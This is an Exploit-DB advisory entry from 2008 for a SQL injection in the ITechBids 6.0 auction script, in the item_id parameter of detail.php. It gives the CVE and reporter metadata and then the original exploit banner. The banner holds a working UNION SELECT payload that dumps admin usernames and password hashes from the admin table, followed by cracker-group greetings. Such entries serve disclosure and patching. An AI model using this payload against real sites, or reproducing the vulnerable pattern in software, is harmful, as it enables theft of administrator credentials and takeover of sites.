ITechBids 6.0 detail.php item_id SQL Injection Vulnerability

2008-02-10T00:00:00
ID EDB-ID:5096
Type exploitdb
Reporter SoSo H H
Modified 2008-02-10T00:00:00

Description

ITechBids 6.0 (detail.php item_id) SQL Injection Vulnerability. CVE-2008-0776. Webapps exploit for php platform

                                        
                                            ############################################################################
# ITechBids v.6.0 Gold Edition Sql Injection Exploit                       #
#                                                                          #
# AUTHOR:SoSo H H (Iraqi-Cracker)                                          #
#                                                                          #
# Script Site: http://itechscripts.com/                                    #
#                                                                          #
# Price:$125.00                                                            #
#                                                                          #
#                                                                          #
############################################################################
# Exploit in:                                                              #
# detail.php?item_id==(SQL)                                                #
#                                                                          #
# Example:                                                                 #
#                                                                          #
# (SQL)=-1%20union+select+1,2,3,concat(user_name,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from%20admin/*#
############################################################################
# Greetz:                                                                  #
# L!0N,El Mariachi,My Sweet,Shadow Administrator,TrYaG Team,Iraqi-KoRn     #
# Mini.Spider,and All 7shasha Boards Members!                              #
############################################################################

# milw0rm.com [2008-02-10]